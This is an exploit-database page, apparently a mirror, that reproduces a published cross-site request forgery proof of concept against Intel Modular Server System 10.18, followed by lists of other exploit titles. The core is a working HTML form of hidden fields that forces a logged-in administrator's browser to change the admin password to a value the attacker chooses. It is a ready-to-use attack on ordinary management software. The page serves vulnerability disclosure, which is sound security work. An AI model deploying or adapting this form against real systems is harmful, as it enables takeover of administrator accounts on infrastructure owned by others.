Menu

"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)"

Author

LiquidWorm

Platform

php

Release date

2019-03-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<!--

Intel Modular Server System 10.18 CSRF Change Admin Password Exploit


Vendor: Intel Corporation
Product web page: https://www.intel.com
Affected version: 10.18.100.20130627.38849
                  5.5.100.20091202.19584

Summary: The Intel Modular Server System is a blade system manufactured by
Intel using their own motherboards and processors. The Intel Modular Server
System consists of an Intel Modular Server Chassis, up to six diskless Compute
Blades, an integrated storage area network (SAN), and three to five Service
Modules.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.30
           lighttpd/1.4.21
           PHP/5.3.10
           PHP/5.2.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5514
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5514.php


11.03.2019

-->


<html>
  <body>
  <script>history.pushState('', 't00t', 'index.php')</script>
    <form action="https://192.168.1.17:444/users/?table=User&UserId=1&action=edit&template=none" method="POST">
      <input type="hidden" name="_dbTable[User][1][UserId]" value="1" />
      <input type="hidden" name="_dbTable[User][1][Username]" value="admin" />
      <input type="hidden" name="_dbTable[User][1][AuthMethod]" value="Local" />
      <input type="hidden" name="_dbTable[User][1][Password][update]" value="on" />
      <input type="hidden" name="_dbTable[User][1][Password][new]" value="(ontrol!23" />
      <input type="hidden" name="_dbTable[User][1][Password][confirm]" value="(ontrol!23" />
      <input type="hidden" name="_dbTable[User][1][AlertEmail]" value="lab@zeroscience.mk" />
      <input type="hidden" name="_dbTable[User][1][CriticalEmail]" value="" />
      <input type="hidden" name="_dbTable[User][1][Phone]" value="031-337-101" />
      <input type="hidden" name="_dbTable[User][1][Locked]" value="0" />
      <input type="hidden" name="action" value="Update" />
      <input type="hidden" name="_dbTable[UserRights][21][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][22][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][23][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][24][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][25][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][26][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][27][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][28][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][29][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][247][Alerts]" value="3" />
      <input type="hidden" name="DbTable" value="User" />
      <input type="hidden" name="DbTableKey" value="1" />
      <input type="submit" value="Do et!" />
    </form>
  </body>
</html>
Release Date Title Type Platform Author
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
2019-08-02 "1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting" webapps php "Kusol Watchara-Apanukorn"
2019-08-02 "Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection" webapps php n1x_
2019-08-02 "Sar2HTML 3.2.1 - Remote Command Execution" webapps php "Cemal Cihad ÇİFTÇİ"
2019-08-01 "WebIncorp ERP - SQL injection" webapps php n1x_
Release Date Title Type Platform Author
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - 'ContactsCtrl.dll' / 'eSpaceStatusCtrl.dll' ActiveX Heap Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace 1.1.11.103 - Image File Format Handling Buffer Overflow" dos windows LiquidWorm
2019-05-20 "Huawei eSpace Meeting 1.1.11.103 - 'cenwpoll.dll' SEH Buffer Overflow (Unicode)" dos windows LiquidWorm
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-16 "SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service" dos windows LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - Information Disclosure" webapps php LiquidWorm
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46541/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46541/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46541/40990/intel-modular-server-system-1018-cross-site-request-forgery-change-admin-password/download/", "exploit_id": "46541", "exploit_description": "\"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)\"", "exploit_date": "2019-03-14", "exploit_author": "LiquidWorm", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse